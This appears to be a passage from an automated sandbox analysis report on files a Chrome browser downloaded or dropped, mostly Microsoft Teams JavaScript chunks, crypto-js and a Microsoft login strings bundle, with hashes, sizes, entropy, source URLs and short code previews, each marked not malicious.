                                                                                                                                                                                                                                                                            SSDEEP:384:UOmMRB7DsuJmOv7+ijeoTfJoINLEqF+5BGk:fbsVqtjPThorVJ
                                                                                                                                                                                                                                                                            MD5:34407BE2AFA1792CDB44C58E48ABFB23
                                                                                                                                                                                                                                                                            SHA1:C9AC25CF2AB6163F1C8288A3E32E669785CD4021
                                                                                                                                                                                                                                                                            SHA-256:F766D7CA6D6CBC1572B1DA8B46566A26B1BAFC66487193886FC2CD9190E42944
                                                                                                                                                                                                                                                                            SHA-512:570FD69E553A4E228D9DC003A204F91D183A9801AB0EE9A99D696B1E7808B31F312453DA26704A36D794BD84E7A834BFD36C3A6E5DFD7C63F4E128DE9A2821A3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/19528-b6fec175b219cd79.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[19528],{408501:r=>{r.exports=function(r,t,n){switch(n.length){case 0:return r.call(t);case 1:return r.call(t,n[0]);case 2:return r.call(t,n[0],n[1]);case 3:return r.call(t,n[0],n[1],n[2])}return r.apply(t,n)}},816349:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length;++n<e&&!1!==t(r[n],n,r););return r}},44953:(r,t,n)=>{var e=n(939767);r.exports=function(r,t){return!!(null==r?0:r.length)&&e(r,t,0)>-1}},875597:r=>{r.exports=function(r,t,n){for(var e=-1,o=null==r?0:r.length;++e<o;)if(n(t,r[e]))return!0;return!1}},816920:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length,o=Array(e);++n<e;)o[n]=t(r[n],n,r);return o}},698078:r=>{r.exports=function(r){return r.split("")}},907001:(r,t,n)=>{var e=n(314172),o=n(484636);r.exports=function(r,t,n){(void 0!==n&&!o(r[t],n)||void 0===n&&!(t in r))&&e(r,t,n)}},872791:(r,t,n)=>{var e=n(314172),o=n(484636),u=Object.prototype.hasOwnProp
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):48316
                                                                                                                                                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8075)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):8183
                                                                                                                                                                                                                                                                            Entropy (8bit):5.452879557388358
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:p5nTsCC5OZ/ri3k3OaRBfhKBQbM0TWFSOI+i:pNTbC5WriUeOBfhKWo0TWsV+i
                                                                                                                                                                                                                                                                            MD5:D0C1845DD5B6BDF7C4C9DA9D9482E8D2
                                                                                                                                                                                                                                                                            SHA1:EFA57190BBB3231B218AEAC83F94FDF886439B2D
                                                                                                                                                                                                                                                                            SHA-256:BF0F629CCA5CA0A776BD1F55B52130816E68DAA080BDB2E97F41505558180858
                                                                                                                                                                                                                                                                            SHA-512:8C79FA6E9CE7A416B22581EEB2837856A40ECFE10B8392CBD00D38BFE25528F75193582A879C2D4E5CEC4426D5837C7395EAF492EB352517371316712CBA80AD
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[626119],{306747:(e,n,t)=>{t.d(n,{W:()=>O});var o=t(513432),r=t(903561),s=t(910889),a=t(437932),u=t(411947),c=t(589256),l=t(602835),i=t(132915),p=t(585536),v=t(257495),f=t(953291),d=t(35871),m=t(553864),g=t(868976),h=t(719914),k=t(514795);const b=["after","after-bottom","before-top","before","before-bottom","above"],C=e=>{const[n,t]=(0,c.i)({state:e.checkedValues,defaultState:e.defaultCheckedValues,initialState:{}});return[n,(0,l.D)(((n,{name:o,checkedItems:r})=>{var s;null===(s=e.onCheckedValueChange)||void 0===s||s.call(e,n,{name:o,checkedItems:r}),t((e=>({...e,[o]:r})))}))]},y=e=>{const{targetDocument:n}=(0,d.useFluent_unstable)(),t=(0,g.tv)((e=>e.setOpen)),r=(0,l.D)(((n,t)=>{var o;return null===(o=e.onOpenChange)||void 0===o?void 0:o.call(e,n,t)})),s=o.useRef(!1),[a,u]=(0,c.i)({state:e.open,defaultState:e.defaultOpen,initialState:!1}),k=(0,l.D)(((n,o)=>{const s=n instanceo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (762)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):870
                                                                                                                                                                                                                                                                            Entropy (8bit):5.301211793639726
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38YKmDCex7DpbSHIo4OqoYVMcGOqolHixNSYbH:wp3sp37bCkvVk2qH
                                                                                                                                                                                                                                                                            MD5:F12EA2701724109C363A74AF2EA3EA39
                                                                                                                                                                                                                                                                            SHA1:DA31AFBF27568A376C8BE1B792C9372B31C2C4E9
                                                                                                                                                                                                                                                                            SHA-256:0D8398F412E8E9C50053E27370BBFCC05728D5661835987D3838171434A602D8
                                                                                                                                                                                                                                                                            SHA-512:BB5963F801DF116F9AB20799365BABF10C864CF14E1A82C1E9DD03C8C2364F4D6819598B7BB0D7191DE2D0D94137980CF6DF05079416373E66B55D733CF72CD4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[718583],{718583:(e,a,t)=>{t.d(a,{Z:()=>i});var s=t(513432),c=t(395225),l=t.n(c),n=t(485529),r=t(829289),i=(0,n.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 16 16",className:a.svg},s.createElement("path",{className:l()(r.Q.outline,a.outlinePart),d:"M8,1A7,7,0,1,1,1,8,7.008,7.008,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"}),s.createElement("g",{className:l()(r.Q.filled,a.filledPart)},s.createElement("path",{d:"M8,1A7,7,0,1,1,1,8,7.008,7.008,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"}),s.createElement("circle",{cx:"8",cy:"8",r:"5"})))},displayName:"RadioButtonIcon"})}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/718583-24621dda8c5747d2.js.map
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (41594)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):41712
                                                                                                                                                                                                                                                                            Entropy (8bit):5.29491411540647
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:4kqwbq1jw+8Thjo4i+I3h2Zixcer63Ns5qJKOw:4RwbqFuTCjIer69Jdw
                                                                                                                                                                                                                                                                            MD5:F9D05C5CD421E615E84AA0595ACAA352
                                                                                                                                                                                                                                                                            SHA1:DD1975343D52A1565C4BAFEF306729040FEA1C9B
                                                                                                                                                                                                                                                                            SHA-256:B75C9801EC0811E358FFC023B1644C416F99808033F551F71E5E948FF785A5B1
                                                                                                                                                                                                                                                                            SHA-512:AFD2EE8C0C3C5A7E688ACAA757881DD1F7912E63E6C95EA013CDE33F22956CD09B8811FD3432472ACA1C370BCB69B83420C651A040492E73157A3B69375A7BA4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/412417-b3da2627a5108e3b.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[412417],{975021:(e,t,n)=>{n.d(t,{$3:()=>s,or:()=>c,I6:()=>f,Xx:()=>d,Ui:()=>p,gk:()=>h,iJ:()=>v,T9:()=>m,d1:()=>y,mv:()=>g,cy:()=>b});var r=n(850734),i=n(813801),o=n(613995),a=n(401385),u=n(597309),s=Object.prototype.hasOwnProperty;function c(e,t){var n=e.__typename,r=e.id,i=e._id;if("string"==typeof n&&(t&&(t.keyObject=void 0!==r?{id:r}:void 0!==i?{_id:i}:void 0),void 0===r&&(r=i),void 0!==r))return"".concat(n,":").concat("number"==typeof r||"string"==typeof r?r:JSON.stringify(r))}var l={dataIdFromObject:c,addTypename:!0,resultCaching:!0,canonizeResults:!1};function f(e){return(0,r.o)(l,e)}function d(e){var t=e.canonizeResults;return void 0===t?l.canonizeResults:t}function p(e,t){return(0,i.A_)(t)?e.get(t.__ref,"__typename"):t&&t.__typename}var h=/^[_a-z][_0-9a-z]*/i;function v(e){var t=e.match(h);return t?t[0]:e}function m(e,t,n){return!!(0,o.U)(t)&&(b(t)?t.every((function(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (16818)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):16926
                                                                                                                                                                                                                                                                            Entropy (8bit):4.362870418102451
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:aeT2QchAQIkioSiLpvXvG0jG7qK5nMLnc8tTN2X:ay2SvoDL1G0jEqNtHe
                                                                                                                                                                                                                                                                            MD5:5450896D19CD95D38819ECFC647F50CF
                                                                                                                                                                                                                                                                            SHA1:D24BF7BB706FE338CF431A6E0D1E1F33A8986E30
                                                                                                                                                                                                                                                                            SHA-256:C660FD33AC63B542079EC18942BC44706A72EA66C8578B9AA670CE6374FB6CAF
                                                                                                                                                                                                                                                                            SHA-512:14C56692904F92A014EF75C035F06A401645EC72E2DA2CF96C7CF6DEA28998F13714E44E9A232818193AFC6B17AD9BD408B86082C53F81EB858ED8C90B807412
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[883493],{883493:(a,c,Z)=>{Z.d(c,{gx6:()=>e,Al9:()=>h,Z4M:()=>m,KNV:()=>v,ODU:()=>M,Ur$:()=>A,a4t:()=>V,OO9:()=>r,uaw:()=>H,tec:()=>o,nSO:()=>s,vlH:()=>U,nUE:()=>n,vmL:()=>P,Vu$:()=>d,f6D:()=>i,yAv:()=>u,nJR:()=>C,L_y:()=>t,DwU:()=>g,lEC:()=>R,p2N:()=>p,tNe:()=>F,Z2I:()=>k,BXb:()=>L,MOA:()=>b,afj:()=>_,oZ6:()=>O,iEn:()=>w,CDz:()=>S,mXj:()=>N,tEH:()=>y,nUM:()=>D});var l=Z(693935);const e=(0,l.U)("Organization20Filled","20",["M7 5a3 3 0 1 1 3.5 2.96V9.5h3c.83 0 1.5.67 1.5 1.5v1.04a3 3 0 1 1-1 0V11a.5.5 0 0 0-.5-.5h-7a.5.5 0 0 0-.5.5v1.04a3 3 0 1 1-1 0V11c0-.83.67-1.5 1.5-1.5h3V7.96A3 3 0 0 1 7 5Z"]),h=(0,l.U)("Organization20Regular","20",["M10 2a3 3 0 0 0-.5 5.96V9.5h-3c-.83 0-1.5.67-1.5 1.5v1.04a3 3 0 1 0 1 0V11c0-.28.22-.5.5-.5h7c.28 0 .5.22.5.5v1.04a3 3 0 1 0 1 0V11c0-.83-.67-1.5-1.5-1.5h-3V7.96A3 3 0 0 0 10 2ZM8 5a2 2 0 1 1 4 0 2 2 0 0 1-4 0ZM3.5 15a2 2 0 1 1 4 0 2 2 0 0 1-4
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):110000
                                                                                                                                                                                                                                                                            Entropy (8bit):5.022656432488014
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:d6Pum+zZuT9O0I5m6w6HFKDsElAimnjHiv01CRiL9+8VQ6Kme:d6Pu1ZyO1m6w6ULOHiv01CRilvKme
                                                                                                                                                                                                                                                                            MD5:9A7BE607ED7D8CE7A198753E8CC2D594
                                                                                                                                                                                                                                                                            SHA1:39B77DB9B6D17FC9520B2279ED3554927A3C21B9
                                                                                                                                                                                                                                                                            SHA-256:61A61E42CEDB2B00B880446916047CF54B4661EA1ABAE08C2A89B4F51827A5DB
                                                                                                                                                                                                                                                                            SHA-512:0CB46587E891E3371ADF6269F6F1B09EB1E7E22426FFD7BD6088C4CB07F0BF70B2B91D7263B8651D6893E2CCB51B2A320350458A6D318F523F28F55E8CF6C6FA
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/364713-5477fa15c06c0013.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[364713],{450787:(t,e,a)=>{"use strict";a.d(e,{I:()=>i});var s=a(554186);class i{constructor(){this._id=(0,s.v4)(),this._dispose=null,this._data={}}get id(){return this._id}get data(){return this._data}set proximitySource(t){this._data["MeetingRoom.proximitySource"]=t}set alertName(t){this._data["DataBag.alertName"]=t}set allAliasesTurnedOff(t){this._data["DataBag.allAliasesTurnedOff"]=t}set allAliasesWithPrivateVisibility(t){this._data["DataBag.allAliasesWithPrivateVisibility"]=t}set tabAppCount(t){this._data["DataBag.tabAppCount"]=t}set appId(t){this._data["DataBag.appId"]=t}set appInstallScope(t){this._data["DataBag.appInstallScope"]=t}set appStoreOriginSource(t){this._data["DataBag.appStoreOriginSource"]=t}set isUserPartOfMeetingAttendeesCount(t){this._data["DataBag.activeCallsCount"]=t}set setIsMeetingGame(t){this._data["DataBag.isMeetingGame"]=t}set autoreconnectShown(t){this._data["
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (32016)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):57510
                                                                                                                                                                                                                                                                            Entropy (8bit):5.3728935008680745
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:ABqF1tlfretkF7IKbVaqDRx3P7ym+d/Px25+1wtv+ixn/TPRUbx3VDg/MvA5Gl:ABrkF7IyJ/7ym+d/Po5+1wtv+iJig/Ml
                                                                                                                                                                                                                                                                            MD5:23C7FEEF919F9374C1B26F019804CDA8
                                                                                                                                                                                                                                                                            SHA1:3E22BA24CFD4F5A1C4D189AAADB1A82A867377C0
                                                                                                                                                                                                                                                                            SHA-256:993A5748DB7B6BC125F88788845A7599234130BCE2858B528071035488CB886D
                                                                                                                                                                                                                                                                            SHA-512:93D4D19CA4BACFC0AD64690E2426D573D47991DAF772D178D5C477369675539274A5E97C666A97A49AD0EC82E566EF4B71E967E7D7FFC575FBD2171E06791276
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                                                                                                                                                                                                                            Preview:!function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.StringsVariantId,s=r.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=t.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (19613)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):19721
                                                                                                                                                                                                                                                                            Entropy (8bit):5.343521820857181
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:i4A/8Siva3/i3RrXxLXY0SQw2XMaeZhrDPuTFi9u5yHfdUsYUnseOrQbDz:Dvi/inXBXMTZpURdS9z
                                                                                                                                                                                                                                                                            MD5:C86832ABA19643DA044A61F0121FC06A
                                                                                                                                                                                                                                                                            SHA1:A44017135CF79D42AAE4E617DD23EB82581DAEA2
                                                                                                                                                                                                                                                                            SHA-256:8835A3F9BF4B64E64A7A9ED20D3C9E5EF3B791C3C80776D644CDD63DE9AA4558
                                                                                                                                                                                                                                                                            SHA-512:67E319B01367F2924520272DF1C9A54EB6D483E6CF064561FE0E4B6C2C55779434C6D574C5B624EFF81D32BDC5A415759B8FE477E7605187145BEC38F747E941
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/914945-cba296ef334bdcfb.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[914945],{593279:(e,n,t)=>{t.d(n,{i:()=>a});var r=t(888846),i=t(240364),o=t(504158),a=function(e){return{attributes:{root:{role:"menu"}},focusZone:{props:{isCircularNavigation:!0,shouldFocusInnerElementWhenReceivedFocus:!0,direction:e.vertical?r.E.vertical:r.E.horizontal}},childBehaviors:{item:i.b,divider:o.d}}}},504158:(e,n,t)=>{t.d(n,{d:()=>r});var r=function(){return{attributes:{root:{role:"presentation"}}}}},240364:(e,n,t)=>{t.d(n,{b:()=>o});var r=t(953543),i=t(504405),o=function(e){var n;return{attributes:{wrapper:{role:"presentation"},root:(n={role:"menuitem",tabIndex:0,"aria-expanded":e.hasMenu?e.menuOpen||!1:void 0,"aria-haspopup":e.hasMenu?"true":void 0,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"],"aria-disabled":e.disabled},n[i.P]=!0,n)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:r.rC.Ente
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):79350
                                                                                                                                                                                                                                                                            Entropy (8bit):4.361667020708487
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:JyFDl5rfjPfLO9InrulCCVfCLHaS29dbb3NbyH4IxnV94Jy:JurfnTCVfmHaS29dbb3dyH4I6y
                                                                                                                                                                                                                                                                            MD5:B4D415B263C182DB54F9262709BE4FD7
                                                                                                                                                                                                                                                                            SHA1:6C659EC1CD040E16F6CFFB51BEC5EADD2599C6D1
                                                                                                                                                                                                                                                                            SHA-256:50F0B4ADA66B0150FDD49F92EC770B29AD1D73A2CA0C62E0BD982C63F2CD447B
                                                                                                                                                                                                                                                                            SHA-512:E0662D53C739252E0F4CF5743B610AE9AEB80CC69F6800F95B99426431C4932EDA8C6E0DD135DEB8C26F5F1B8E15005813AB0EBFE8EC96CE0368BDC1F9502BCF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/941359-9026e0bb33bc2d9d.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[941359],{941359:(a,l,Z)=>{Z.d(l,{fSE:()=>h,TP9:()=>m,LSe:()=>e,v9w:()=>v,y2B:()=>M,cbT:()=>H,zb1:()=>V,nY7:()=>A,SXh:()=>i,Qi2:()=>L,xkB:()=>U,xHU:()=>r,wDt:()=>d,GqH:()=>g,ma3:()=>u,yKV:()=>t,EAE:()=>o,wIE:()=>F,F8W:()=>n,n_S:()=>R,ba$:()=>C,dMU:()=>s,ILi:()=>f,chi:()=>b,Aig:()=>p,EEN:()=>I,MLu:()=>O,mUJ:()=>k,xG7:()=>G,bio:()=>S,l8b:()=>N,B7m:()=>z,EMy:()=>E,kOy:()=>_,nYd:()=>w,bL$:()=>y,Q_I:()=>B,IMc:()=>D,OJr:()=>K,ipe:()=>P,h19:()=>T,XN6:()=>x,BYz:()=>Q,Bj:()=>Y,$RO:()=>X,Ftl:()=>j,fbj:()=>q,nKf:()=>J,TkK:()=>$,pO8:()=>W,Lin:()=>aa,nT:()=>la,oCE:()=>Za,K$r:()=>ca,M1Y:()=>ha,O0v:()=>ma,SH1:()=>ea,AqR:()=>va,Hzn:()=>Ma,t1F:()=>Ha,SrQ:()=>Va,a3S:()=>Aa,_Vr:()=>ia,QQo:()=>La,BBu:()=>Ua,Bul:()=>ra,uk7:()=>da,YFz:()=>ga,$jj:()=>ua,$4h:()=>ta,PHn:()=>oa,z4P:()=>Fa,N_H:()=>na,BFD:()=>Ra,YXI:()=>Ca,gTi:()=>sa,spK:()=>fa,wJr:()=>ba,sNG:()=>pa,gZ8:()=>Ia,B8A:()=>Oa,pLc:()=>ka,r43:(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (652)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):765
                                                                                                                                                                                                                                                                            Entropy (8bit):5.403587201614664
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12:/4p3sp38VFlHKVqZhZbZ9XVPBnMzHoFsnbFIJFse+mMcQZgDhsDzrhV2zLWEZJgJ:wp3sp38fNVj179BnMDwyKJFse+mMcQ5j
                                                                                                                                                                                                                                                                            MD5:54D48CA40676CE5F69A75299285057CB
                                                                                                                                                                                                                                                                            SHA1:A966259EFE700E5AC0CDDE0011BCAFB996E7AFF7
                                                                                                                                                                                                                                                                            SHA-256:AA84EC5E9B9AE3037FC966D7B72208A6CD18649BBA5F74595724176370025EC1
                                                                                                                                                                                                                                                                            SHA-512:70212CD3140E22187EE307F37EAC0A069848243762C86FB76747AF532035B299250C7A32E2B7CAF5648009DFD5991F73B52118218B6AF23A618767C291875E9C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/data-schema-0ac7440254a0a997.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[893369],{168570:(e,a,r)=>{r.r(a),r.d(a,{ClientSchema:()=>s,Schema:()=>n,ServerSchema:()=>t,resolvers:()=>i.u,typeDefs:()=>c});var t={};r.r(t);var s={};r.r(s);var n={};r.r(n);var c=r(876152),i=r(701426)},701426:(e,a,r)=>{r.d(a,{u:()=>n});var t=r(425104),s=r(699899);const n={BigInt:s.BM,DateTime:s.Ps,JSONData:s.kJ,ScalarEnumString:new t.Ag({name:"ScalarEnumString",description:"ScalarEnumString custom scalar type used for object that can use toString",parseValue:e=>e.toString(),serialize:e=>e.toString(),parseLiteral:e=>e&&e.value})}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/data-schema-0ac7440254a0a997.js.map
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (53670)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):53798
                                                                                                                                                                                                                                                                            Entropy (8bit):5.230039416671407
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:S+yEFdQ+a4BitfPsk2lvRCkl67sCtbK6xYSZdj6qYMvnshwdWeMg3r:1dsFsk2lLc1Zb
                                                                                                                                                                                                                                                                            MD5:4305A98733CD8A3B3F365BDEEECF0249
                                                                                                                                                                                                                                                                            SHA1:D62D1C89267292689AD19BAF36141BD68505FABF
                                                                                                                                                                                                                                                                            SHA-256:5475C34EA8E2478D7C44EF365C2F476DC80C26DDEA2099A13006AD383F35A523
                                                                                                                                                                                                                                                                            SHA-512:65FA7A5E8DE9BF97FC0E366E768B877C2F9A85D5780ED18341B6AF878D5E9B0DDAE058F58A0291C731A9492FEA40DB463B22952D1B2D0B71E9DF0A1DC228AB0D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[420340],{944244:e=>{"use strict";var t=function(e){return function(e){return!!e&&"object"==typeof e}(e)&&!function(e){var t=Object.prototype.toString.call(e);return"[object RegExp]"===t||"[object Date]"===t||function(e){return e.$$typeof===s}(e)}(e)};var s="function"==typeof Symbol&&Symbol.for?Symbol.for("react.element"):60103;function r(e,t){return!1!==t.clone&&t.isMergeableObject(e)?a((s=e,Array.isArray(s)?[]:{}),e,t):e;var s}function i(e,t,s){return e.concat(t).map((function(e){return r(e,s)}))}function n(e){return Object.keys(e).concat(function(e){return Object.getOwnPropertySymbols?Object.getOwnPropertySymbols(e).filter((function(t){return Object.propertyIsEnumerable.call(e,t)})):[]}(e))}function o(e,t){try{return t in e}catch(e){return!1}}function l(e,t,s){var i={};return s.isMergeableObject(e)&&n(e).forEach((function(t){i[t]=r(e[t],s)})),n(t).forEach((function(n){(function(e,t){ret
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (28012)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):28119
                                                                                                                                                                                                                                                                            Entropy (8bit):5.228116933115004
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:/8Xyeuhomhazs2UksOiRTtBEUkLrJvM7KqvZwP:quXaUcJvM7KAZm
                                                                                                                                                                                                                                                                            MD5:D35DB86B493E76A2724D88D286A8A8D6
                                                                                                                                                                                                                                                                            SHA1:72E04E2FE7724D655650031FC2801FAC761B665E
